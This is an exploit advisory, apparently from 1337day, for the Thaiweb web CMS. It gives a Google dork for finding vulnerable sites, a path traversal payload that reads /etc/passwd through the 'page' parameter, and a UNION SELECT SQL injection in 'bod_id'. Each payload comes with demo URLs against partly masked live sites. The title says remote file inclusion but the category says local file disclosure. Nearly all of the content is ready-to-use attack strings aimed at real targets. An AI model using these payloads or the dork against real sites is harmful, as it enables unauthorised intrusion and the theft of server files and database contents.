Thaiweb <= Remote File Inclusion Vulnerability

# Exploit Title: Thaiweb <= Remote File Inclusion Vulnerability
# Date: 19/12/2012
# Author: GoLd_M (Libyan) Page FaceBook (http://www.facebook.com/pages/337878286310383)
# Category:: Local File Disclosure Vulnerability
# Google Dork: intext:powered by Thaiweb. inurl:index.php?page=board.php
# Ex :[Thaiweb]/index.php?page=../../../../../../../../../../../../../etc/passwd
# Demo:
# 01 :http://giXXX.th/index.php?page=../../../../../../../../../../../../../etc/passwd
# 02 :http://www.keyXXXsin.com/index.php?page=../../../../../../../../../../../../../etc/passwd
# 03 :http://www.reaXXwebthai.com/index.php?page=../../../../../../../../../../../../../etc/passwd
 
# Google Dork: intext:powered by Thaiweb. inurl:index.php?page=board.php
# Ex :[Thaiweb]/index.php?page=boardque.php&bod_id=4'
# Demo:
# 01 :http://www.keyXXsin.com//index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
# 02 :http://wwXXartnerthailand.com/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
# 03 :http://gifXX.th/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
 
# 1337day.com [2012-12-20]